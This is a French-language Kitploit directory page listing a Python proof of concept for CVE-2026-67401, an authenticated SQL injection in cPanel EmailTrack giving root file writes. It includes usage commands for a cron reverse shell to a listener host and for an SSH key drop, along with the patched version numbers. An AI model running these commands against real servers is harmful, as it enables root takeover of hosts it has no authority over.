Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-67401 — Preuve de concept en Python pour CVE-2026-67401, une injection SQL authentifiée dans cPanel EmailTrack permettant l'écriture arbitraire de fichiers en tant que root via SQLite ATTACH DATABASE, permettant un reverse shell ou le dépôt d'une clé SSH. | Kitploit
Outils/GitHubGitHub/axedos/cve-2026-67401
Escalade de PrivilègesExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubaxedos/cve-2026-67401

CVE-2026-67401

Preuve de concept en Python pour CVE-2026-67401, une injection SQL authentifiée dans cPanel EmailTrack permettant l'écriture arbitraire de fichiers en tant que root via SQLite ATTACH DATABASE, permettant un reverse shell ou le dépôt d'une clé SSH.

Voir le dépôt
il y a 16h 13mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-67401

Injection SQL dans cPanel EmailTrack. Un utilisateur cPanel authentifié disposant de privilèges de messagerie écrit des fichiers arbitraires en tant que root via SQLite ATTACH DATABASE. Une seule requête vers root. Non testé sur une cible réelle, le code est uniquement assemblé à partir d'informations publiques et de diff basiques. Faites preuve de diligence en tant que chercheur, testez-le et envoyez des correctifs via PR.

Concerne toutes les versions cPanel/WHM antérieures au correctif du 8 septembre 2026.

Ce qui doit être présent

  • Un compte cPanel valide avec privilèges de messagerie sur le serveur cible
  • Python 3, bibliothèque requests
  • Un listener si vous utilisez la charge utile de shell inversé

Comment l'utiliser

root@kitploit:~
# Shell inversé via cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443

# Dépôt de clé SSH
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub

# Session existante
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1

# Exécution à blanc (affiche la requête, ne l'envoie pas)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1

CORRECTIFS

  • 11.138.0.4 (CURRENT/EDGE)
  • 11.136.0.39 (RELEASE/STABLE)
  • 11.134.0.55 (LTS)
Télécharger l’outil